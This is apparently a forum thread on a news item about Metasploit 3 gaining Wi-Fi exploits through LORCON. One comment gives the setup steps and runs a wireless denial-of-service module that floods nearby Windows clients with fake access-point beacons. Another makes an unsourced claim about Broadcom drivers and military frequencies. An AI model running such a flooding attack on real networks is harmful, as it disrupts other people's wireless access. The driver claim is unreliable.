Wi-Fi Exploits Coming to Metasploit

bucksDrop writes "Eweek.com is reporting that the Metasploit Project will add 802.11 (Wi-Fi) exploits to a new version of its point-and-click attack tool. Metasploit 3 will integrate kernel-mode payloads to allow users to use existing user-mode payloads for both kernel and non-kernel exploits. Metasploit is collaborating with Jon 'Johnny Cache' Ellch and implementing it by wrapping the LORCON library."

Re:Math problem

For those too lazy to work it out...

Wi-Fi = i(W-F) = 3673.7 ( 0.3) = 802.11

So where is the code? Right here.

[spinja]

Install the latest Lorcon snapshot:
$ http://www.802.11mercenary.net/lorcon/

Grab the latest version of metasploit 3:
$ svn co http://metasploit.com/svn/framework3/trunk/

Compile the Metasploit Lorcon wrapper:
$ cd trunk/external/msflorcon
$ make

Plug in a support network card (I use a WPN511 with the madwifi-old driver in Gentoo)

Load the Metasploit Console (as root, since it needs raw WiFi access)
# trunk/msfconsole

Play with some of the demo modules :-)

This is an example of sending fake beacon requests to flood the Windows Wireless Network Browser:
msf > use auxiliary/dos/wireless/fakeap
msf auxiliary(fakeap) > show options

Module options:

      CHANNEL 11 yes The default channel number
      DRIVER madwifi yes The name of the wireless driver for lorcon
      INTERFACE ath0 yes The name of the wireless interface

Type the "run" command, or use "set VARIABLE VALUE" to change these options.

msf auxiliary(fakeap) >run

Re:This begs the question...

[ehrichweiss]

I don't know why others might not release their drivers' source but I know that Broadcomm apparently can't do it for at least some of their wireless cards because they apparently can be tuned into some military-only frequencies and needless to say that's not a good thing.